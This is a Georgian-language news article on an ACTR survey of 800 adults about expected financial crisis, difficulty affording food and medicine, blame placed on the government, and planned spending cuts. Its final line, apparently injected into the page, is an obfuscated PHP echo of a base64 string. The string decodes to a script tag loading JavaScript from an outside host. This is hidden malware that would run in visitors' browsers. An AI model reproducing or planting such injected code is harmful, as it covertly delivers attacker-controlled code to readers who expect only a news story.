gorgia
ავერსი jaluzi

საქართველოს მოსახლეობის ნახევარზე მეტი - 56% მიიჩნევს, რომ ქვეყანაში ან უკვე დაწყებულია, ან უახლოეს 6 თვეში დაიწყება ფინანსური კრიზისი - ამის შესახებ აღნიშნულია ACTR-ის ახალ კვლევაში. ამასთან, ორგანიზაციის მიერ ჩატარებული გამოკითხვისას გამოიკვეთა, რომ მოსახლეობის 47%-ს ყოველდღიურად უჭირს კვებისთვის აუცილებელი პროდუქტების ყიდვა.

ადგილობრივი და გლობალური პოლიტიკური დაძაბულობის ფონზე, ეკონომიკური სტაბილურობის საკითხი საქართველოში განსაკუთრებულ მნიშვნელობას იძენს. „ეისითი კვლევის“ (ACTR) მიერ ჩატარებული საზოგადოებრივი აზრის კვლევის მიხედვით, რომელმაც მოსახლეობის განწყობები შეისწავლა საქართველოში ეკონომიკური კრიზისის მოლოდინებისა და ხარჯვის პრიორიტეტების შესახებ, იკვეთება, რომ საზოგადოებაში ეკონომიკური კრიზისის მოლოდინი მაღალია:

საქართველოს მოსახლეობის ნახევარზე მეტი - 56% მიიჩნევს, რომ ქვეყანაში ან უკვე დაწყებულია, ან უახლოეს 6 თვეში დაიწყება ფინანსური კრიზისი.

კვლევისას გამოიკვეთა, რომ ბოლო 6 თვის განმავლობაში, მოსახლეობის 36%-ის ფინანსური მდგომარეობა გაუარესდა.

„როგორც ჩანს, შიში ეკონომიკური მომავლის მიმართ არ არის მხოლოდ თეორიული მოლოდინი, არამედ ეს განცდა უკვე არსებულ რეალობასაც ეფუძნება“, - აღნიშნულია კვლევაში.

კვლევის მიხედვით:

მოსახლეობის 47%-ს უჭირს კვებისთვის აუცილებელი პროდუქტების ყიდვა.
55%-თვის გამოწვევას წარმოადგენს წამლებისა და სამედიცინო მომსახურების შეძენა.
ეს მიანიშნებს იმაზე, რომ ფინანსური რესურსების შეზღუდვა კრიტიკულად ეხება ადამიანის ყოველდღიურ, ბაზისურ საჭიროებებს - წერია კვლევაში.

ეკონომიკური სირთულეების ფონზე, განსაკუთრებულად აქტუალური ხდება იმის გარკვევა, თუ ვის ეკისრება პასუხისმგებლობა შექმნილ ვითარებაზე და ვინ უნდა იყოს ძირითადი აქტორი მისი გამოსწორების პროცესში. კვლევის მიხედვით, მოსახლეობის 44% ცხოვრების პირობების გაუარესებაზე პასუხისმგებლად მთავრობას მიიჩნევს. ეს ტენდენცია ნათლად მიუთითებს იმაზე, რომ საზოგადოება ხელისუფლებას აღიქვამს, როგორც მთავარი გადაწყვეტილებების მიმღებ სუბიექტს და ეკონომიკური მდგომარეობის ცვლილების ძირითად განმაპირობებელ ძალას. ამავე დროს, 29% საკუთარ თავზეც იღებს პასუხისმგებლობას და აღნიშნავს, რომ არსებულ სიტუაციაში წვლილი მათაც მიუძღვით - წერია ანგარიშში.

რაც შეეხება მომხმარებელთა ქცევას, კითხვაზე, თუ რა ტიპის ხარჯების შემცირებას გეგმავენ, კვლევისას ასეთი შედეგები გამოიკვეთა.

ეკონომიკური პრობლემების გაღრმავების შემთხვევაში, მოსახლეობა პირველ რიგში HORECA სექტორს განიხილავს ხარჯების შემცირების სამიზნედ. კვლევის შედეგების მიხედვით:
მოსახლეობის 30% ხარჯების დაზოგვას გეგმავს მოგზაურობასა და დასვენებაზე,
ხოლო 29% — გართობის მიმართულებით.


„ეს მაჩვენებლები მიუთითებს, რომ ფინანსური კრიზისის გაღრმავების ფონზე HORECA ბიზნესს მომხმარებელთა კლების ყველაზე მაღალი რისკი აქვს.

ეკონომიკური არასტაბილურობის პირობებში, გარკვეულ კატეგორიებში მოსახლეობა კვლავ ინარჩუნებს ხარჯვის მაღალ განწყობას, რაც მიუთითებს ამ სერვისებისა და პროდუქტების სტრატეგიულ მნიშვნელობაზე.

გამოკითხულთა 68% აცხადებს, რომ უახლოეს 6 თვეში, სავარაუდოდ, თანხას დახარჯავს ჯანმრთელობისა და თავის მოვლის პროდუქტებზე.

აღნიშნული ადასტურებს, რომ ჯანმრთელობა მოსახლეობისთვის უმაღლეს პრიორიტეტად რჩება.

გარდა ამისა, 40% განიხილავს ხარჯვას განათლების მიმართულებით, რაც შესაძლოა აღქმულ იქნას როგორც გრძელვადიანი ინვესტიცია საკუთარი მომავლის მიმართ. ეს მიანიშნებს მოსახლეობის ნაწილში არსებული განწყობისკენ - ეკონომიკური არასტაბილურობა პროფესიული განვითარების გზით გადალახონ.

ხარჯვის მინიმალური განწყობა ფიქსირდება ფინანსური ინვესტიციების მიმართულებით, სადაც მხოლოდ 16% განიხილავს ფულის ჩადებას.

აღნიშნული ტენდენცია ასახავს, რომ არასტაბილურ ეკონომიკურ გარემოში, მოსახლეობა ნაკლებადაა მიდრეკილი რესურსების რისკიან აქტივებში განთავსებისკენ. ამ პირობებში განსაკუთრებულ მნიშვნელობას იძენს პირველადი საჭიროებების დაფარვა და ფინანსური სტაბილურობის შენარჩუნება ყოველდღიურ ცხოვრებაში.

საბოლოოდ, ნათლად იკვეთება, რომ მოსახლეობაში არსებობს ეკონომიკური დაღმასვლის მოლოდინი, რაც გავლენას ახდენს მათ ფინანსურ გეგმებსა და ხარჯვით პრიორიტეტებზე. მთავარი აქცენტი კეთდება საარსებოდ მნიშვნელოვან საჭიროებებზე, ხოლო შედარებით არასასიცოცხლოდ მნიშვნელოვანი მიმართულებები - როგორიცაა მოგზაურობა, დასვენება, გართობა - ნაკლებად პრიორიტეტული ხდება“, - წერია ანგარიშში.

ცნობისათვის, ორგანიზაციამ გამოკითხვა „საქართველოში ეკონომიკური კრიზისის მოლოდინები და ხარჯვის პრიორიტეტები“ ჩაატარა შემთხვევითი შერჩევის გზით, 800 ზრდასრულ მოსახლეს შორის, საქართველოს მასშტაბით. გამოკითხვა მიმდინარეობდა 2025 წლის 17-23 მარტს. მონაცემთა სტატისტიკური ცდომილება საშუალოდ არ აღემატება 3.5%-ს. გამოყენებული მეთოდი – სატელეფონო გამოკითხვა.

132
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");